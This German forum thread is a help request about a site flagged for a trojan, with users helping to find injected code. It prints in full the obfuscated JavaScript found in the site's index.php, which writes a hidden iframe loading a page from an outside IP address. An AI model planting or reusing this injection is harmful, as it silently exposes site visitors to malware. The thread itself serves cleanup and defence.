vasily
Problembeschreibung:
Seit neusten bekomme ich auf meiner Seite
www.RollerTuner.com immer ne Virus Meldung!!!
ich weiß nicht ob euch da schon was bekannt ist???
Fehlermeldung:
Trojaner
Link zum Forum oder Screenshot:
>>>Bild zum Problem<<<
Was wurde zuletzt geändert oder eingebaut?
zu letzt wurde das Video addon eingebaut soviel ich weiß
auf Hilfe wäre ich sehr Dankbar ...
Mit freundlichen Grüßen Sven
vasily
ich kann dir nicht sagen auf welchen seiten genau das kommt auf
www.RollerTuner.com
jedoch haben sich einige Mitglieder schon bei mir gemeldet das sie ne Virus Meldung bekommen ...
und nach was genau muss ich dann suchen ?
bin kein php Profi ^^
Agi
Hast du in irgendeinem Template nen Iframe Code eingebaut?
vasily
nop .. hab nixx eingebaut was mit i frame zu tun hat .. eingebaut ist der werbungs hack wo auch die google werbung und die afili werbung drinn laufen ..
aber ne i frame verlinkung existiert meines wissens nach nicht.
Master-X
Schau mal in deinen Quelltext ob dort ein nicht dahingehörender Code ist. Wenn du nicht weißt, was gemeint ist, dann kannst du den Quelltext hier auch posten.
Ich werde das Forum jedenfalls nicht betreten
C-Board
Ich hab's mal versucht. Das Portal geht ja noch. Aber auf die Hauptseite läßt mich mein G-DATA AVK2008 gar nicht erst
@vasily
Seit zwei Tagen besteht das Problem. Hast Du das, was
Maniac_81 Dir geraten hat, schon mal gecheckt?
Wenn Du unsicher bist, dann exportiere die drei Templates, erstelle ein Archiv mit WinZip und häng dieses hier mal an.
| Zitat: |
jedoch haben sich einige Mitglieder schon bei mir gemeldet das sie ne Virus Meldung bekommen ...
|
Dürfte klar sein, warum nicht
alle 
Ist eine Frage des richtigen AV-Scanners
Master-X hat Recht. Dir könnte man nur helfen, wenn man seinen eigenen AV-Schutz deaktivieren würde. Und das kann nun wirklich nicht Sinn der Sache sein
Gruß Mike
vasily
ein kumpel von mir hat mir das geschickt !!!
ich hoffe Ihr könnt damit was anfangen
| code: |
1:
|
<html><iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v481022692f0bc(v481022692f888){ function v4810226930046 () {var v4810226930826=16; return v4810226930826;} return(parseInt(v481022692f888,v4810226930046()));}function v481022693191b(v4810226931f96){ function v48102269336fb () {var v4810226933ecc=2; return v4810226933ecc;} var v4810226932762='';for(v4810226932f33=0; v4810226932f33<v4810226931f96.length; v4810226932f33+=v48102269336fb()){ v4810226932762+=(String.fromCharCode(v481022692f0bc(v4810226931f96.substr(v4810226932f33, v48102269336fb()))));}return v4810226932762;} document.write(v481022693191b('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D3161333839643338346237207372633D5C27687474703A2F2F37372E3232312E3133332E3135302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3135393734292B2731625C272077696474683D3938206865696768743D313633207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script> |
|
NTVB
Schau mal in diesen beide Dateien: index.php, login.php
Bei einem anderen Forum war bei einem dieser Dateien der Code drinnen
C-Board
@vasily
Seit dem 29. April hast Du nun das Problem. Das sind zwei Wochen. Und Du reagierst leider nicht auf das, was Dir hier die User geschrieben haben.
Wie soll/kann man Dir denn noch helfen??
Gruß Mike
Master-X
Schau mal im Template "Header", ob du dort diesen Code ebenfalls findest.
vasily
alles klar danke Jungs .. es war in der index.php drinn ganz unten ..
jetzt isses erst mal weg ... bin mal gespannt wie lange es dauert bis es wieder kommt.
Vielen Dank an alle Gruß Sven
Master-X
Präventionsmaßnahmen wären wohl sinnvoller, als auf den nächsten Hacker zu warten.